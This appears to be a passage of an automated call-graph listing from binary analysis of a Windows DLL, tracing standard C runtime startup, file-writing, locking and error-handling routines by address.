___std_exception_copy 26 API calls 7414->7418 7416 2359571e _free 20 API calls 7415->7416 7416->7408 7417 23594ff3 7419 235962bc ___std_exception_copy 11 API calls 7417->7419 7418->7408 7418->7411 7418->7412 7418->7414 7418->7417 7420 2359571e _free 20 API calls 7418->7420 7421 23594fff 7419->7421 7420->7418 5977 23592049 5979 23592055 ___DestructExceptionObject 5977->5979 5978 2359205e 5979->5978 5980 2359207d 5979->5980 5981 235920d3 5979->5981 5991 2359244c 5980->5991 6012 23592639 IsProcessorFeaturePresent 5981->6012 5984 235920da 5985 23592082 6000 23592308 5985->6000 5987 23592087 __RTC_Initialize 6003 235920c4 5987->6003 5989 2359209f 6006 2359260b 5989->6006 5992 23592451 ___scrt_release_startup_lock 5991->5992 5993 23592455 5992->5993 5997 23592461 5992->5997 6016 2359527a 5993->6016 5996 2359246e 5996->5985 5997->5996 6019 2359499b 5997->6019 6098 235934c7 RtlInterlockedFlushSList 6000->6098 6002 23592312 6002->5987 6100 2359246f 6003->6100 6005 235920c9 ___scrt_release_startup_lock 6005->5989 6007 23592617 6006->6007 6011 2359262d 6007->6011 6141 235953ed 6007->6141 6011->5978 6013 2359264e ___scrt_fastfail 6012->6013 6014 235926f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6013->6014 6015 23592744 ___scrt_fastfail 6014->6015 6015->5984 6041 23595132 6016->6041 6020 235949a7 _abort 6019->6020 6021 235949bf 6020->6021 6063 23594af5 GetModuleHandleW 6020->6063 6072 23595671 RtlEnterCriticalSection 6021->6072 6025 23594a65 6077 23594aa5 6025->6077 6029 23594a3c 6030 23594a54 6029->6030 6073 23594669 6029->6073 6036 23594669 _abort 5 API calls 6030->6036 6031 235949c7 6031->6025 6031->6029 6038 2359527a _abort 20 API calls 6031->6038 6032 23594aae 6088 2359bdc9 6032->6088 6033 23594a82 6080 23594ab4 6033->6080 6036->6025 6038->6029 6044 235950e1 6041->6044 6043 2359245f 6043->5985 6045 235950ed ___DestructExceptionObject 6044->6045 6052 23595671 RtlEnterCriticalSection 6045->6052 6047 235950fb 6053 2359515a 6047->6053 6051 23595119 _abort 6051->6043 6052->6047 6054 2359517a 6053->6054 6057 23595182 6053->6057 6055 23592ada _ValidateLocalCookies 5 API calls 6054->6055 6056 23595108 6055->6056 6059 23595126 6056->6059 6057->6054 6058 2359571e _free 20 API calls 6057->6058 6058->6054 6062 235956b9 RtlLeaveCriticalSection 6059->6062 6061 23595130 6061->6051 6062->6061 6064 235949b3 6063->6064 6064->6021 6065 23594b39 GetModuleHandleExW 6064->6065 6066 23594b63 GetProcAddress 6065->6066 6067 23594b78 6065->6067 6066->6067 6068 23594b8c FreeLibrary 6067->6068 6069 23594b95 6067->6069 6068->6069 6070 23592ada _ValidateLocalCookies 5 API calls 6069->6070 6071 23594b9f 6070->6071 6071->6021 6072->6031 6074 23594698 6073->6074 6075 23592ada _ValidateLocalCookies 5 API calls 6074->6075 6076 235946c1 6075->6076 6076->6030 6091 235956b9 RtlLeaveCriticalSection 6077->6091 6079 23594a7e 6079->6032 6079->6033 6092 23596025 6080->6092 6083 23594ae2 6086 23594b39 _abort 8 API calls 6083->6086 6084 23594ac2 GetPEB 6084->6083 6085 23594ad2 GetCurrentProcess TerminateProcess 6084->6085 6085->6083 6087 23594aea ExitProcess 6086->6087 6089 23592ada _ValidateLocalCookies 5 API calls 6088->6089 6090 2359bdd4 6089->6090 6090->6090 6091->6079 6093 2359604a 6092->6093 6097 23596040 6092->6097 6094 23595c45 __dosmaperr 5 API calls 6093->6094 6094->6097 6095 23592ada _ValidateLocalCookies 5 API calls 6096 23594abe 6095->6096 6096->6083 6096->6084 6097->6095 6099 235934d7 6098->6099 6099->6002 6105 235953ff 6100->6105 6112 23595c2b 6105->6112 6108 2359391b 6109 2359354d 6108->6109 6110 23593925 6108->6110 6109->6005 6123 23593b2c 6110->6123 6113 23592476 6112->6113 6114 23595c35 6112->6114 6113->6108 6116 23595db2 6114->6116 6117 23595c45 __dosmaperr 5 API calls 6116->6117 6118 23595dd9 6117->6118 6119 23595df1 TlsFree 6118->6119 6122 23595de5 6118->6122 6119->6122 6120 23592ada _ValidateLocalCookies 5 API calls 6121 23595e02 6120->6121 6121->6113 6122->6120 6128 23593a82 6123->6128 6125 23593b46 6126 23593b5e TlsFree 6125->6126 6127 23593b52 6125->6127 6126->6127 6127->6109 6129 23593aaa 6128->6129 6133 23593aa6 __crt_fast_encode_pointer 6128->6133 6129->6133 6134 235939be 6129->6134 6132 23593ac4 GetProcAddress 6132->6133 6133->6125 6137 235939cd try_get_first_available_module 6134->6137 6135 23593a77 6135->6132 6135->6133 6136 235939ea LoadLibraryExW 6136->6137 6138 23593a05 GetLastError 6136->6138 6137->6135 6137->6136 6139 23593a60 FreeLibrary 6137->6139 6140 23593a38 LoadLibraryExW 6137->6140 6138->6137 6139->6137 6140->6137 6152 235974da 6141->6152 6144 23593529 6145 23593532 6144->6145 6151 23593543 6144->6151 6146 2359391b ___vcrt_uninitialize_ptd 6 API calls 6145->6146 6147 23593537 6146->6147 6156 23593972 6147->6156 6151->6011 6153 235974f3 6152->6153 6154 23592ada _ValidateLocalCookies 5 API calls 6153->6154 6155 23592625 6154->6155 6155->6144 6157 2359397d 6156->6157 6159 2359353c 6156->6159 6158 23593987 RtlDeleteCriticalSection 6157->6158 6158->6158 6158->6159 6160 23593c50 6159->6160 6161 23593c7f 6160->6161 6163 23593c59 6160->6163 6161->6151 6162 23593c69 FreeLibrary 6162->6163 6163->6161 6163->6162 7518 23598a89 7519 23596d60 51 API calls 7518->7519 7520 23598a8e 7519->7520 6164 23595348 6165 23593529 ___vcrt_uninitialize 8 API calls 6164->6165 6166 2359534f 6165->6166 6167 23597b48 6177 23598ebf 6167->6177 6171 23597b55 6190 2359907c 6171->6190 6174 23597b7f 6175 2359571e _free 20 API calls 6174->6175 6176 23597b8a 6175->6176 6194 23598ec8 6177->6194 6179 23597b50 6180 23598fdc 6179->6180 6181 23598fe8 ___DestructExceptionObject 6180->6181 6214 23595671 RtlEnterCriticalSection 6181->6214 6183 2359905e 6228 23599073 6183->6228 6185 2359906a _abort 6185->6171 6186 23599032 RtlDeleteCriticalSection 6188 2359571e _free 20 API calls 6186->6188 6189 23598ff3 6188->6189 6189->6183 6189->6186 6215 2359a09c 6189->6215 6191 23599092 6190->6191 6192 23597b64 RtlDeleteCriticalSection 6190->6192 6191->6192 6193 2359571e _free 20 API calls 6191->6193 6192->6171 6192->6174 6193->6192 6195 23598ed4 ___DestructExceptionObject 6194->6195 6204 23595671 RtlEnterCriticalSection 6195->6204 6197 23598f77 6209 23598f97 6197->6209 6200 23598ee3 6200->6197 6203 23598e78 66 API calls 6200->6203 6205 23597b94 RtlEnterCriticalSection 6200->6205 6206 23598f6d 6200->6206 6201 23598f83 _abort 6201->6179 6203->6200 6204->6200 6205->6200 6212 23597ba8 RtlLeaveCriticalSection 6206->6212 6208 23598f75 6208->6200 6213 235956b9 RtlLeaveCriticalSection 6209->6213 6211 23598f9e 6211->6201 6212->6208 6213->6211 6214->6189 6216 2359a0a8 ___DestructExceptionObject 6215->6216 6217 2359a0b9 6216->6217 6218 2359a0ce 6216->6218 6219 23596368 __dosmaperr 20 API calls 6217->6219 6227 2359a0c9 _abort 6218->6227 6234 23597b94 RtlEnterCriticalSection 6218->6234 6220 2359a0be 6219->6220 6231 235962ac 6220->6231 6223 2359a0ea 6235 2359a026 6223->6235 6225 2359a0f5 6251 2359a112 6225->6251 6227->6189 6600 235956b9 RtlLeaveCriticalSection 6228->6600 6230 2359907a 6230->6185 6254 23596231 6231->6254 6233 235962b8 6233->6227 6234->6223 6236 2359a048 6235->6236 6237 2359a033 6235->6237 6243 2359a043 6236->6243 6275 23598e12 6236->6275 6238 23596368 __dosmaperr 20 API calls 6237->6238 6240 2359a038 6238->6240 6241 235962ac ___std_exception_copy 26 API calls 6240->6241 6241->6243 6243->6225 6244 2359907c 20 API calls 6245 2359a064 6244->6245 6281 23597a5a 6245->6281 6247 2359a06a 6288 2359adce 6247->6288 6250 2359571e _free 20 API calls 6250->6243 6599 23597ba8 RtlLeaveCriticalSection 6251->6599 6253 2359a11a 6253->6227 6255 23595b7a __dosmaperr 20 API calls 6254->6255 6256 23596247 6255->6256 6257 235962a6 6256->6257 6261 23596255 6256->6261 6265 235962bc IsProcessorFeaturePresent 6257->6265 6259 235962ab 6260 23596231 ___std_exception_copy 26 API calls 6259->6260 6262 235962b8 6260->6262 6263 23592ada _ValidateLocalCookies 5 API calls 6261->6263 6262->6233 6264 2359627c 6263->6264 6264->6233 6266 235962c7 6265->6266 6269 235960e2 6266->6269 6270 235960fe ___scrt_fastfail 6269->6270 6271 2359612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6270->6271 6274 235961fb ___scrt_fastfail 6271->6274 6272 23592ada _ValidateLocalCookies 5 API calls 6273 23596219 GetCurrentProcess TerminateProcess 6272->6273 6273->6259 6274->6272 6276 23598e2a 6275->6276 6277 23598e26 6275->6277 6276->6277 6278 23597a5a 26 API calls 6276->6278 6277->6244 6279 23598e4a 6278->6279 6303 23599a22 6279->6303 6282 23597a7b 6281->6282 6283 23597a66 6281->6283 6282->6247 6284 23596368 __dosmaperr 20 API calls 6283->6284 6285 23597a6b 6284->6285 6286 235962ac ___std_exception_copy 26 API calls 6285->6286 6287 23597a76 6286->6287 6287->6247 6289 2359addd 6288->6289 6290 2359adf2 6288->6290 6291 23596355 __dosmaperr 20 API calls 6289->6291 6292 2359ae2d 6290->6292 6297 2359ae19 6290->6297 6294 2359ade2 6291->6294 6293 23596355 __dosmaperr 20 API calls 6292->6293 6295 2359ae32 6293->6295 6296 23596368 __dosmaperr 20 API calls 6294->6296 6298 23596368 __dosmaperr 20 API calls 6295->6298 6301 2359a070 6296->6301 6556 2359ada6 6297->6556 6300 2359ae3a 6298->6300 6302 235962ac ___std_exception_copy 26 API calls 6300->6302 6301->6243 6301->6250 6302->6301 6304 23599a2e ___DestructExceptionObject 6303->6304 6305 23599a4e 6304->6305 6306 23599a36 6304->6306 6308 23599aec 6305->6308 6313 23599a83 6305->6313 6328 23596355 6306->6328 6310 23596355 __dosmaperr 20 API calls 6308->6310 6312 23599af1 6310->6312 6311 23596368 __dosmaperr 20 API calls 6314 23599a43 _abort 6311->6314 6315 23596368 __dosmaperr 20 API calls 6312->6315 6331 23598c7b RtlEnterCriticalSection 6313->6331 6314->6277 6317 23599af9 6315->6317 6319 235962ac ___std_exception_copy 26 API calls 6317->6319 6318 23599a89 6320 23599aba 6318->6320 6321 23599aa5 6318->6321 6319->6314 6332 23599b0d 6320->6332 6323 23596368 __dosmaperr 20 API calls 6321->6323 6325 23599aaa 6323->6325 6324 23599ab5 6383 23599ae4 6324->6383 6326 23596355 __dosmaperr 20 API calls 6325->6326 6326->6324 6329 23595b7a __dosmaperr 20 API calls 6328->6329 6330 2359635a 6329->6330 6330->6311 6331->6318 6333 23599b3b 6332->6333 6370 23599b34 6332->6370 6334 23599b3f 6333->6334 6335 23599b5e 6333->6335 6337 23596355 __dosmaperr 20 API calls 6334->6337 6338 23599baf 6335->6338 6339 23599b92 6335->6339 6336 23592ada _ValidateLocalCookies 5 API calls 6340 23599d15 6336->6340 6341 23599b44 6337->6341 6342 23599bc5 6338->6342 6386 2359a00b 6338->6386 6344 23596355 __dosmaperr 20 API calls 6339->6344 6340->6324 6343 23596368 __dosmaperr 20 API calls 6341->6343 6389 235996b2 6342->6389 6346 23599b4b 6343->6346 6348 23599b97 6344->6348 6349 235962ac ___std_exception_copy 26 API calls 6346->6349 6351 23596368 __dosmaperr 20 API calls 6348->6351 6349->6370 6354 23599b9f 6351->6354 6352 23599c0c 6355 23599c20 6352->6355 6356 23599c66 WriteFile 6352->6356 6353 23599bd3 6357 23599bf9 6353->6357 6358 23599bd7 6353->6358 6359 235962ac ___std_exception_copy 26 API calls 6354->6359 6360 23599c28 6355->6360 6361 23599c56 6355->6361 6363 23599c89 GetLastError 6356->6363 6369 23599bef 6356->6369 6401 23599492 GetConsoleCP 6357->6401 6362 23599ccd 6358->6362 6396 23599645 6358->6396 6359->6370 6365 23599c2d 6360->6365 6366 23599c46 6360->6366 6427 23599728 6361->6427 6362->6370 6372 23596368 __dosmaperr 20 API calls 6362->6372 6363->6369 6365->6362 6412 23599807 6365->6412 6419 235998f5 6366->6419 6369->6362 6369->6370 6374 23599ca9 6369->6374 6370->6336 6373 23599cf2 6372->6373 6376 23596355 __dosmaperr 20 API calls 6373->6376 6377 23599cb0 6374->6377 6378 23599cc4 6374->6378 6376->6370 6379 23596368 __dosmaperr 20 API calls 6377->6379 6434 23596332 6378->6434 6381 23599cb5 6379->6381 6382 23596355 __dosmaperr 20 API calls 6381->6382 6382->6370 6555 23598c9e RtlLeaveCriticalSection 6383->6555 6385 23599aea 6385->6314 6439 23599f8d 6386->6439 6461 23598dbc 6389->6461 6391 235996c2 6392 235996c7 6391->6392 6470 23595af6 GetLastError 6391->6470 6392->6352 6392->6353 6394 235996ea 6394->6392 6395 23599708 GetConsoleMode 6394->6395 6395->6392 6397 2359966a 6396->6397 6400 2359969f 6396->6400 6398 2359a181 WriteConsoleW CreateFileW 6397->6398 6399 235996a1 GetLastError 6397->6399 6397->6400 6398->6397 6399->6400 6400->6369 6405 23599607 6401->6405 6410 235994f5 6401->6410 6402 23592ada _ValidateLocalCookies 5 API calls 6404 23599641 6402->6404 6404->6369 6405->6402 6406 2359957b WideCharToMultiByte 6406->6405 6408 235995a1 WriteFile 6406->6408 6407 235979e6 40 API calls __fassign 6407->6410 6409 2359962a GetLastError 6408->6409 6408->6410 6409->6405 6410->6405 6410->6406 6410->6407 6411 235995d2 WriteFile 6410->6411 6534 23597c19 6410->6534 6411->6409 6411->6410 6414 23599816 6412->6414 6413 235998d8 6416 23592ada _ValidateLocalCookies 5 API calls 6413->6416 6414->6413 6415 23599894 WriteFile 6414->6415 6415->6414 6417 235998da GetLastError 6415->6417 6418 235998f1 6416->6418 6417->6413 6418->6369 6424 23599904 6419->6424 6420 23599a0f 6421 23592ada _ValidateLocalCookies 5 API calls 6420->6421 6422 23599a1e 6421->6422 6422->6369 6423 23599986 WideCharToMultiByte 6425 235999bb WriteFile 6423->6425 6426 23599a07 GetLastError 6423->6426 6424->6420 6424->6423 6424->6425 6425->6424 6425->6426 6426->6420 6431 23599737 6427->6431 6428 235997ea 6430 23592ada _ValidateLocalCookies 5 API calls 6428->6430 6429 235997a9 WriteFile 6429->6431 6432 235997ec GetLastError 6429->6432 6433 23599803 6430->6433 6431->6428 6431->6429 6432->6428 6433->6369 6435 23596355 __dosmaperr 20 API calls 6434->6435 6436 2359633d __dosmaperr 6435->6436 6437 23596368 __dosmaperr 20 API calls 6436->6437 6438 23596350 6437->6438 6438->6370 6448 23598d52 6439->6448 6441 23599f9f 6442 23599fb8 SetFilePointerEx 6441->6442 6443 23599fa7 6441->6443 6445 23599fac 6442->6445 6446 23599fd0 GetLastError 6442->6446 6444 23596368 __dosmaperr 20 API calls 6443->6444 6444->6445 6445->6342 6447 23596332 __dosmaperr 20 API calls 6446->6447 6447->6445 6449 23598d5f 6448->6449 6450 23598d74 6448->6450 6451 23596355 __dosmaperr 20 API calls 6449->6451 6453 23596355 __dosmaperr 20 API calls 6450->6453 6455 23598d99 6450->6455 6452 23598d64 6451->6452 6454 23596368 __dosmaperr 20 API calls 6452->6454 6456 23598da4 6453->6456 6457 23598d6c 6454->6457 6455->6441 6458 23596368 __dosmaperr 20 API calls 6456->6458 6457->6441 6459 23598dac 6458->6459 6460 235962ac ___std_exception_copy 26 API calls 6459->6460 6460->6457 6462 23598dc9 6461->6462 6463 23598dd6 6461->6463 6464 23596368 __dosmaperr 20 API calls 6462->6464 6465 23598de2 6463->6465 6466 23596368 __dosmaperr 20 API calls 6463->6466 6467 23598dce 6464->6467 6465->6391 6468 23598e03 6466->6468 6467->6391 6469 235962ac ___std_exception_copy 26 API calls 6468->6469 6469->6467 6471 23595b12 6470->6471 6472 23595b0c 6470->6472 6474 2359637b __dosmaperr 20 API calls 6471->6474 6476 23595b61 SetLastError 6471->6476 6473 23595e08 __dosmaperr 11 API calls 6472->6473 6473->6471 6475 23595b24 6474->6475 6477 23595b2c 6475->6477 6478 23595e5e __dosmaperr 11 API calls 6475->6478 6476->6394 6479 2359571e _free 20 API calls 6477->6479 6480 23595b41 6478->6480 6481 23595b32 6479->6481 6480->6477 6482 23595b48 6480->6482 6483 23595b6d SetLastError 6481->6483 6484 2359593c __dosmaperr 20 API calls 6482->6484 6490 235955a8 6483->6490 6485 23595b53 6484->6485 6487 2359571e _free 20 API calls 6485->6487 6489 23595b5a 6487->6489 6489->6476 6489->6483 6501 23597613 6490->6501 6492 235955b8 6495 235955e0 6492->6495 6496 235955c2 IsProcessorFeaturePresent 6492->6496 6531 23594bc1 6495->6531 6497 235955cd 6496->6497 6499 235960e2 _abort 8 API calls 6497->6499 6499->6495 6502 23597581 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6501->6502 6503 235955ad 6502->6503 6503->6492 6504 2359766e 6503->6504 6505 2359767a _abort 6504->6505 6506 23595b7a __dosmaperr 20 API calls 6505->6506 6510 235976a7 _abort 6505->6510 6511 235976a1 _abort 6505->6511 6506->6511 6507 235976f3 6508 23596368 __dosmaperr 20 API calls 6507->6508 6509 235976f8 6508->6509 6512 235962ac ___std_exception_copy 26 API calls 6509->6512 6515 23595671 _abort RtlEnterCriticalSection 6510->6515 6516 2359771f 6510->6516 6511->6507 6511->6510 6530 235976d6 6511->6530 6512->6530 6513 2359bdc9 _abort 5 API calls 6514 23597875 6513->6514 6514->6492 6515->6516 6517 2359777e 6516->6517 6519 23597776 6516->6519 6521 235956b9 _abort RtlLeaveCriticalSection 6516->6521 6527 235977a9 6516->6527 6523 23597665 _abort 38 API calls 6517->6523 6517->6527 6518 2359782e _abort RtlLeaveCriticalSection 6520 235977fd 6518->6520 6522 23594bc1 _abort 28 API calls 6519->6522 6524 23595af6 _abort 38 API calls 6520->6524 6528 2359780c 6520->6528 6520->6530 6521->6519 6522->6517 6525 2359779f 6523->6525 6524->6528 6526 23597665 _abort 38 API calls 6525->6526 6526->6527 6527->6518 6529 23595af6 _abort 38 API calls 6528->6529 6528->6530 6529->6530 6530->6513 6532 2359499b _abort 28 API calls 6531->6532 6533 23594bd2 6532->6533 6535 23595af6 _abort 38 API calls 6534->6535 6536 23597c24 6535->6536 6539 23597a00 6536->6539 6540 23597a28 6539->6540 6541 23597a13 6539->6541 6540->6410 6541->6540 6543 23597f0f 6541->6543 6544 23597f1b ___DestructExceptionObject 6543->6544 6545 23595af6 _abort 38 API calls 6544->6545 6546 23597f24 6545->6546 6547 23595671 _abort RtlEnterCriticalSection 6546->6547 6548 23597f72 _abort 6546->6548 6549 23597f42 6547->6549 6548->6540 6550 23597f86 __fassign 20 API calls 6549->6550 6551 23597f56 6550->6551 6552 23597f75 __fassign RtlLeaveCriticalSection 6551->6552 6553 23597f69 6552->6553 6553->6548 6554 235955a8 _abort 38 API calls 6553->6554 6554->6548 6555->6385 6559 2359ad24 6556->6559 6558 2359adca 6558->6301 6560 2359ad30 ___DestructExceptionObject 6559->6560 6570 23598c7b RtlEnterCriticalSection 6560->6570 6562 2359ad3e 6563 2359ad70 6562->6563 6564 2359ad65 6562->6564 6565 23596368 __dosmaperr 20 API calls 6563->6565 6571 2359ae4d 6564->6571 6567 2359ad6b 6565->6567 6586 2359ad9a 6567->6586 6569 2359ad8d _abort 6569->6558 6570->6562 6572 23598d52 26 API calls 6571->6572 6574 2359ae5d 6572->6574 6573 2359ae63 6589 23598cc1 6573->6589 6574->6573 6575 2359ae95 6574->6575 6578 23598d52 26 API calls 6574->6578 6575->6573 6579 23598d52 26 API calls 6575->6579 6581 2359ae8c 6578->6581 6582 2359aea1 CloseHandle 6579->6582 6580 2359aedd 6580->6567 6584 23598d52 26 API calls 6581->6584 6582->6573 6585 2359aead GetLastError 6582->6585 6583 23596332 __dosmaperr 20 API calls 6583->6580 6584->6575 6585->6573 6598 23598c9e RtlLeaveCriticalSection 6586->6598 6588 2359ada4 6588->6569 6590 23598cd0 6589->6590 6591 23598d37 6589->6591 6590->6591 6595 23598cfa 6590->6595 6592 23596368 __dosmaperr 20 API calls 6591->6592 6593 23598d3c 6592->6593 6594 23596355 __dosmaperr 20 API calls 6593->6594 6596 23598d27 6594->6596 6595->6596 6597 23598d21 SetStdHandle 6595->6597 6596->6580 6596->6583 6597->6596 6598->6588 6599->6253 6600->6230 7521 2359508a 7522 2359509c 7521->7522 7523 235950a2 7521->7523 7524 23595000 20 API calls 7522->7524 7524->7523 6798 2359220c 6799 2359221a dllmain_dispatch 6798->6799 6800 23592215 6798->6800 6802 235922b1 6800->6802 6803 235922c7 6802->6803 6805 235922d0 6803->6805 6806 23592264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6803->6806 6805->6799 6806->6805 6601 2359284f 6604 23592882 6601->6604 6607 23593550 6604->6607 6606 2359285d 6608 2359355d 6607->6608 6611 2359358a 6607->6611 6609 235947e5 ___std_exception_copy 21 API calls 6608->6609 6608->6611 6610 2359357a 6609->6610 6610->6611 6613 2359544d 6610->6613 6611->6606 6614 23595468 6613->6614 6615 2359545a 6613->6615 6616 23596368 __dosmaperr 20 API calls 6614->6616 6615->6614 6620 2359547f 6615->6620 6617 23595470 6616->6617 6618 235962ac ___std_exception_copy 26 API calls 6617->6618 6619 2359547a 6618->6619 6619->6611 6620->6619 6621 23596368 __dosmaperr 20 API calls 6620->6621 6621->6617 6622 2359724e GetProcessHeap 6623 23598640 6626 23598657 6623->6626 6627 23598679 6626->6627 6628 23598665 6626->6628 6630 23598681 6627->6630 6631 23598693 6627->6631 6629 23596368 __dosmaperr 20 API calls 6628->6629 6632 2359866a 6629->6632 6633 23596368 __dosmaperr 20 API calls 6630->6633 6637 23598652 6631->6637 6639 235954a7 6631->6639 6635 235962ac ___std_exception_copy 26 API calls 6632->6635 6636 23598686 6633->6636 6635->6637 6638 235962ac ___std_exception_copy 26 API calls 6636->6638 6638->6637 6640 235954ba 6639->6640 6641 235954c4 6639->6641 6640->6637 6641->6640 6642 23595af6 _abort 38 API calls 6641->6642 6643 235954e5 6642->6643 6644 23597a00 __fassign 38 API calls 6643->6644 6645 235954fe 6644->6645 6647 23597a2d 6645->6647 6648 23597a40 6647->6648 6649 23597a55 6647->6649 6648->6649 6651 23596d7e 6648->6651 6649->6640 6652 23596d8a ___DestructExceptionObject 6651->6652 6653 23595af6 _abort 38 API calls 6652->6653 6658 23596d94 6653->6658 6655 23596e18 _abort 6655->6649 6657 235955a8 _abort 38 API calls 6657->6658 6658->6655 6658->6657 6659 2359571e _free 20 API calls 6658->6659 6660 23595671 RtlEnterCriticalSection 6658->6660 6661 23596e0f 6658->6661 6659->6658 6660->6658 6664 235956b9 RtlLeaveCriticalSection 6661->6664 6663 23596e16 6663->6658 6664->6663 7525 23597a80 7526 23597a8d 7525->7526 7527 2359637b __dosmaperr 20 API calls 7526->7527 7528 23597aa7 7527->7528 7529 2359571e _free 20 API calls 7528->7529 7530 23597ab3 7529->7530 7531 2359637b __dosmaperr 20 API calls 7530->7531 7535 23597ad9 7530->7535 7532 23597acd 7531->7532 7534 2359571e _free 20 API calls 7532->7534 7533 23595eb7 11 API calls 7533->7535 7534->7535 7535->7533 7536 23597ae5 7535->7536 6665 2359af43 6666 2359af59 6665->6666 6667 2359af4d 6665->6667 6667->6666 6668 2359af52 CloseHandle 6667->6668 6668->6666 6807 23595303 6810 235950a5 6807->6810 6819 2359502f 6810->6819 6813 2359502f 5 API calls 6814 235950c3 6813->6814 6815 23595000 20 API calls 6814->6815 6816 235950ce 6815->6816 6817 23595000 20 API calls 6816->6817 6818 235950d9 6817->6818 6820 23595048 6819->6820 6821 23592ada _ValidateLocalCookies 5 API calls 6820->6821 6822 23595069 6821->6822 6822->6813 6823 23597103 GetCommandLineA GetCommandLineW 6669 2359a945 6671 2359a96d 6669->6671 6670 2359a9a5 6671->6670 6672 2359a99e 6671->6672 6673 2359a997 6671->6673 6682 2359aa00 6672->6682 6678 2359aa17 6673->6678 6679 2359aa20 6678->6679 6686 2359b19b 6679->6686 6683 2359aa20 6682->6683 6684 2359b19b __startOneArgErrorHandling 21 API calls 6683->6684 6685 2359a9a3 6684->6685 6687 2359b1da __startOneArgErrorHandling 6686->6687 6692 2359b25c __startOneArgErrorHandling 6687->6692 6696 2359b59e 6687->6696 6689 2359b286 6691 2359b292 6689->6691 6703 2359b8b2 6689->6703 6694 23592ada _ValidateLocalCookies 5 API calls 6691->6694 6692->6689 6699 235978a3 6692->6699 6695 2359a99c 6694->6695 6710 2359b5c1 6696->6710 6700 235978cb 6699->6700 6701 23592ada _ValidateLocalCookies 5 API calls 6700->6701 6702 235978e8 6701->6702 6702->6689 6704 2359b8bf 6703->6704 6705 2359b8d4 6703->6705 6706 2359b8d9 6704->6706 6708 23596368 __dosmaperr 20 API calls 6704->6708 6707 23596368 __dosmaperr 20 API calls 6705->6707 6706->6691 6707->6706 6709 2359b8cc 6708->6709 6709->6691 6711 2359b5ec __raise_exc 6710->6711 6712 2359b7e5 RaiseException 6711->6712 6713 2359b5bc 6712->6713 6713->6692 7422 23597bc7 7423 23597bd3 ___DestructExceptionObject 7422->7423 7424 23597c0a _abort 7423->7424 7430 23595671 RtlEnterCriticalSection 7423->7430 7426 23597be7 7431 23597f86 7426->7431 7430->7426 7432 23597f94 __fassign 7431->7432 7434 23597bf7 7431->7434 7433 23597cc2 __fassign 20 API calls 7432->7433 7432->7434 7433->7434 7435 23597c10 7434->7435 7438 235956b9 RtlLeaveCriticalSection 7435->7438 7437 23597c17 7437->7424 7438->7437 7439 2359a1c6 IsProcessorFeaturePresent 7537 23599db8 7538 23599dbf 7537->7538 7539 23599e20 7538->7539 7543 23599ddf 7538->7543 7540 2359aa17 21 API calls 7539->7540 7541 2359a90e 7539->7541 7542 23599e6e 7540->7542 7543->7541 7544 2359aa17 21 API calls 7543->7544 7545 2359a93e 7544->7545 6824 2359543d 6825 23595440 6824->6825 6826 235955a8 _abort 38 API calls 6825->6826 6827 2359544c 6826->6827 6828 23591f3f 6829 23591f4b ___DestructExceptionObject 6828->6829 6846 2359247c 6829->6846 6831 23591f52 6832 23591f7c 6831->6832 6833 23592041 6831->6833 6840 23591f57 ___scrt_is_nonwritable_in_current_image 6831->6840 6857 235923de 6832->6857 6835 23592639 ___scrt_fastfail 4 API calls 6833->6835 6836 23592048 6835->6836 6837 23591f8b __RTC_Initialize 6837->6840 6860 235922fc RtlInitializeSListHead 6837->6860 6839 23591f99 ___scrt_initialize_default_local_stdio_options 6861 235946c5 6839->6861 6844 23591fb8 6844->6840 6845 23594669 _abort 5 API calls 6844->6845 6845->6840 6847 23592485 6846->6847 6869 23592933 IsProcessorFeaturePresent 6847->6869 6851 23592496 6856 2359249a 6851->6856 6880 235953c8 6851->6880 6854 235924b1 6854->6831 6855 23593529 ___vcrt_uninitialize 8 API calls 6855->6856 6856->6831 6916 235924b5 6857->6916 6859 235923e5 6859->6837 6860->6839 6862 235946dc 6861->6862 6863 23592ada _ValidateLocalCookies 5 API calls 6862->6863 6864 23591fad 6863->6864 6864->6840 6865 235923b3 6864->6865 6866 235923b8 ___scrt_release_startup_lock 6865->6866 6867 23592933 ___isa_available_init IsProcessorFeaturePresent 6866->6867 6868 235923c1 6866->6868 6867->6868 6868->6844 6870 23592491 6869->6870 6871 235934ea 6870->6871 6872 235934ef ___vcrt_initialize_winapi_thunks 6871->6872 6883 23593936 6872->6883 6875 235934fd 6875->6851 6877 23593505 6878 23593510 6877->6878 6879 23593972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6877->6879 6878->6851 6879->6875 6912 23597457 6880->6912 6884 2359393f 6883->6884 6886 23593968 6884->6886 6887 235934f9 6884->6887 6897 23593be0 6884->6897 6888 23593972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6886->6888 6887->6875 6889 235938e8 6887->6889 6888->6887 6902 23593af1 6889->6902 6894 23593918 6894->6877 6895 2359391b ___vcrt_uninitialize_ptd 6 API calls 6896 235938fd 6895->6896 6896->6877 6898 23593a82 try_get_function 5 API calls 6897->6898 6899 23593bfa 6898->6899 6900 23593c18 InitializeCriticalSectionAndSpinCount 6899->6900 6901 23593c03 6899->6901 6900->6901 6901->6884 6903 23593a82 try_get_function 5 API calls 6902->6903 6904 23593b0b 6903->6904 6905 23593b24 TlsAlloc 6904->6905 6906 235938f2 6904->6906 6906->6896 6907 23593ba2 6906->6907 6908 23593a82 try_get_function 5 API calls 6907->6908 6909 23593bbc 6908->6909 6910 23593bd7 TlsSetValue 6909->6910 6911 2359390b 6909->6911 6910->6911 6911->6894 6911->6895 6915 23597470 6912->6915 6913 23592ada _ValidateLocalCookies 5 API calls 6914 235924a3 6913->6914 6914->6854 6914->6855 6915->6913 6917 235924c8 6916->6917 6918 235924c4 6916->6918 6919 23592639 ___scrt_fastfail 4 API calls 6917->6919 6921 235924d5 ___scrt_release_startup_lock 6917->6921 6918->6859 6920 23592559 6919->6920 6921->6859 7440 23595bff 7448 23595d5c 7440->7448 7443 23595b7a __dosmaperr 20 API calls 7444 23595c1b 7443->7444 7445 23595c28 7444->7445 7446 23595c2b 11 API calls 7444->7446 7447 23595c13 7446->7447 7449 23595c45 __dosmaperr 5 API calls 7448->7449 7450 23595d83 7449->7450 7451 23595d9b TlsAlloc 7450->7451 7452 23595d8c 7450->7452 7451->7452 7453 23592ada _ValidateLocalCookies 5 API calls 7452->7453 7454 23595c09 7453->7454 7454->7443 7454->7447 7546 235967bf 7551 235967f4 7546->7551 7549 